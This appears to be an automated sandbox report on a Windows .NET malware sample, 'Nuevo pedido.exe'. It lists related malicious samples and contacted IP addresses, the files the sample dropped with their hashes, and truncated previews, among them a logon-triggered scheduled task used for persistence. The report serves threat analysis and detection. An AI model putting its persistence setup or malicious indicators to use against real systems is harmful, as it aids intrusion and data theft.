                                                                                                                                          • 1.1.1.1
                                                                                                                                          https://bryf.atchirlisc.ru/EeMAGvIe/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          http://readermodeext.infoGet hashmaliciousUnknownBrowse
                                                                                                                                          • 1.1.1.1
                                                                                                                                          CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.96.1
                                                                                                                                          Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.80.1
                                                                                                                                          Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • 104.21.96.1
                                                                                                                                          24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.174.91
                                                                                                                                          kXzODlqJak.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          ORACLE-BMC-31898USPayment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • 193.122.6.168
                                                                                                                                          December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 193.122.6.168
                                                                                                                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 193.122.6.168
                                                                                                                                          BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 158.101.44.242
                                                                                                                                          VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 193.122.130.0
                                                                                                                                          ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 193.122.130.0
                                                                                                                                          miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.204.251.205
                                                                                                                                          New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          • 193.122.130.0
                                                                                                                                          FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 158.101.44.242
                                                                                                                                          fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 158.101.44.242
                                                                                                                                          SERVERCENTRALUSw22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                          • 50.31.176.165
                                                                                                                                          loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 205.234.141.183
                                                                                                                                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                          • 216.246.5.240
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 50.31.176.165
                                                                                                                                          https://lcatterton.adobesign.gr.com/ryani8QmoTxrrisAT5lc4kattertoTxni8Qc4koTxmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 216.246.46.135
                                                                                                                                          https://its.publimpres.com/northampton.edu/&adfs/ls/client-request-id=7c724&wa=wsignin10.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 216.246.46.21
                                                                                                                                          https://lumanity-chemisphere.qt9qms.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 50.31.141.222
                                                                                                                                          zam.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 50.31.176.103
                                                                                                                                          hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 50.31.176.103
                                                                                                                                          pedido.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 50.31.176.103
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adCTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.16.1
                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eCopy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          s7.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          chrtrome22.exeGet hashmaliciousXmrigBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Purchase Order A2409002.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          No context
                                                                                                                                          Process:C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1216
                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                          Process:C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1216
                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):2232
                                                                                                                                          Entropy (8bit):5.3810236212315665
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:lylWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZmUyus:lGLHxv2IfLZ2KRH6Ouggs
                                                                                                                                          MD5:26F6E40F3C8972F2060C0201AD73BE4F
                                                                                                                                          SHA1:5F5B7154A29951D2BB6DD8E3E8C242A0EE7972BB
                                                                                                                                          SHA-256:82FFFB95FE80EDC9333F96C2051E2CA1C7A40DFA387059211394CB43E2CA5CEA
                                                                                                                                          SHA-512:F10D637941C0E617F9C46CA4AE5369B438F7BACFD7B8FC5C145F63F6ED6AD431E72BE4DE3E86EBA2FA0FFAEC2D1972C0EF35E862F2C2805B2EF703B0BCB349F9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1576
                                                                                                                                          Entropy (8bit):5.119637812203657
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaGxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTrv
                                                                                                                                          MD5:BB513AD68C6B17C817993758D14270AB
                                                                                                                                          SHA1:444DE24DEC11832AB5DA33A4DEB8B30BDC3C4BCD
                                                                                                                                          SHA-256:0C1CDD3F2AF5C797154C7AC15A21FBCAE77CB60E772EA46334459460742AF230
                                                                                                                                          SHA-512:86757EE1C88FF4AC1680A8D3282620F4DED396702279847F2466AA891EF54DFA332FCCC169772845A72F5FEEF635EDF3CD1083B12C18099012B7EEF5C4EE9D55
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                          Process:C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1576
                                                                                                                                          Entropy (8bit):5.119637812203657
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaGxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTrv
                                                                                                                                          MD5:BB513AD68C6B17C817993758D14270AB
                                                                                                                                          SHA1:444DE24DEC11832AB5DA33A4DEB8B30BDC3C4BCD
                                                                                                                                          SHA-256:0C1CDD3F2AF5C797154C7AC15A21FBCAE77CB60E772EA46334459460742AF230
                                                                                                                                          SHA-512:86757EE1C88FF4AC1680A8D3282620F4DED396702279847F2466AA891EF54DFA332FCCC169772845A72F5FEEF635EDF3CD1083B12C18099012B7EEF5C4EE9D55
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                          Process:C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):754176
                                                                                                                                          Entropy (8bit):7.936284236243805
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:zNYVYJdaCiBTiid+myis0hDE+iubk5NG4MXpnHXgYfzDDGl+9dVazSxC9C:i+FeTiid/xs8BiukN3MXpQKzDDGlnAR
                                                                                                                                          MD5:B19A7098F74CE79004FFD6A109302EF0
                                                                                                                                          SHA1:206FF16596FC022D321DF2687440C7942A3C2D4C
                                                                                                                                          SHA-256:1AD584B71B2EBB4FE6418E55F8D261BA662D4AB07E68FF05C1A073580E2419E2
                                                                                                                                          SHA-512:913EE9F0949A89B1A62CF93D21FDFBD3127165A2EF6DC6DAD5D098C3D772F3AB4F844523A103EF16AEEDCB069F3FC154DA7A355A8FC0B2F611978A50EB00A3D7
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7~g..............0..d............... ........@.. ....................................@.................................X...O...................................._..T............................................ ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc..............................@..B........................H........H..............\...xM..........................................^..}.....(.......(.....*.0..V........s...... =...}......{....o....}......{....o....}.....r...p}......{....o....}......+..*...0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(......{.....o .....{........s!...o".....{....r...po#.....{.....:..s$...o%.....{.....o&.....{....r...po'.....{.....o .....{.......;s!...o
                                                                                                                                          Process:C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26
                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Entropy (8bit):7.936284236243805
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                          File name:Nuevo pedido.exe
                                                                                                                                          File size:754'176 bytes
                                                                                                                                          MD5:b19a7098f74ce79004ffd6a109302ef0
                                                                                                                                          SHA1:206ff16596fc022d321df2687440c7942a3c2d4c
                                                                                                                                          SHA256:1ad584b71b2ebb4fe6418e55f8d261ba662d4ab07e68ff05c1a073580e2419e2
                                                                                                                                          SHA512:913ee9f0949a89b1a62cf93d21fdfbd3127165a2ef6dc6dad5d098c3d772f3ab4f844523a103ef16aeedcb069f3fc154da7a355a8fc0b2f611978a50eb00a3d7
                                                                                                                                          SSDEEP:12288:zNYVYJdaCiBTiid+myis0hDE+iubk5NG4MXpnHXgYfzDDGl+9dVazSxC9C:i+FeTiid/xs8BiukN3MXpQKzDDGlnAR
                                                                                                                                          TLSH:C7F412045BE98E99C8A80B3525500A508374FE9984D3E34B769A117F1FE331BDAD2BF7
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7~g..............0..d............... ........@.. ....................................@................................
                                                                                                                                          Icon Hash:26b6dac84c6c3e03
                                                                                                                                          Entrypoint:0x4b82aa
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x677E37E1 [Wed Jan 8 08:31:29 2025 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
